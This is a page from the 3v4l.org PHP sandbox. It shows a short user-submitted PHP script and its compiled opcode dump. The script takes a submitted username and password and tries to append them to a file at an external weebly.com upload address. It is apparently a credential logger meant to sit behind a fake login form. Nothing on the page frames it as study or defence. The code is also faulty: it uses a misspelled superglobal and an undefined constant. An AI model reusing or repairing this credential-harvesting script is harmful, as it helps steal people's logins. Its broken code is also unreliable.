3v4l.org

run code in 300+ PHP versions simultaneously
<?php $fileURL = 'http://www.weebly.com/uploads/4/5/9/7/45973299/logininterfacetest'; if(isset($_Post['username']) && isset($_Post['password'])){ $username = $_Post['username']; $password = $_Post['password']; $account = $username.';'.$password.'!'; file_put_contents(fileUrl, $account, FILE_APPEND); } else { echo $fileURL; } ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 46) Position 1 = 3, Position 2 = 5
Branch analysis from position: 3
2 jumps found. (Code = 43) Position 1 = 6, Position 2 = 21
Branch analysis from position: 6
1 jumps found. (Code = 42) Position 1 = 22
Branch analysis from position: 22
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 21
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 5
filename:       /in/nl6f9
function name:  (null)
number of ops:  23
compiled vars:  !0 = $fileURL, !1 = $_Post, !2 = $username, !3 = $password, !4 = $account
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   ASSIGN                                                   !0, 'http%3A%2F%2Fwww.weebly.com%2Fuploads%2F4%2F5%2F9%2F7%2F45973299%2Flogininterfacetest'
    3     1        ISSET_ISEMPTY_DIM_OBJ                         0  ~6      !1, 'username'
          2      > JMPZ_EX                                          ~6      ~6, ->5
          3    >   ISSET_ISEMPTY_DIM_OBJ                         0  ~7      !1, 'password'
          4        BOOL                                             ~6      ~7
          5    > > JMPZ                                                     ~6, ->21
    4     6    >   FETCH_DIM_R                                      ~8      !1, 'username'
          7        ASSIGN                                                   !2, ~8
    5     8        FETCH_DIM_R                                      ~10     !1, 'password'
          9        ASSIGN                                                   !3, ~10
    6    10        CONCAT                                           ~12     !2, '%3B'
         11        CONCAT                                           ~13     ~12, !3
         12        CONCAT                                           ~14     ~13, '%21'
         13        ASSIGN                                                   !4, ~14
    7    14        INIT_FCALL                                               'file_put_contents'
         15        FETCH_CONSTANT                                   ~16     'fileUrl'
         16        SEND_VAL                                                 ~16
         17        SEND_VAR                                                 !4
         18        SEND_VAL                                                 8
         19        DO_ICALL                                                 
         20      > JMP                                                      ->22
    9    21    >   ECHO                                                     !0
   11    22    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
224.79 ms | 1395 KiB | 15 Q